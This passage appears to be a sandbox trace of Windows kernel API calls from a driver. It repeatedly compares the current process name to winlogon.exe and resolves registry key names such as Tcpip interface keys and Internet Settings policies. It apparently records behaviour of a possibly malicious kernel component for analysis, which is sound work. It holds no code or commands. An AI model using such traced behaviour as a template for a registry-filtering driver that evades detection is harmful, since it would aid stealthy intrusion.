| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{E25A642B-6CEB-4194-8F83-8BC82AF94F5A} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf8, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip6\Parameters\Interfaces\{e25a642b-6ceb-4194-8f83-8bc82af94f5a}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip6\Parameters\Interfaces\{e25a642b-6ceb-4194-8f83-8bc82af94f5a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b91b5770, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b91b5770, Length = 0xf6, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7ad7080, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7ad7080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xc0, ret_val_ptr_out = 0xffffe0003a76e520 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b7ad7080, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7ad7080, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xbe, ret_val_ptr_out = 0xffffe0003a782cc0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b7ad7080, Length = 0xbe, ObjectNameInfo_unk_out = 0xffffe0003a782cc0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782cc0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76e520, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9ce0960, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9ce0960, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
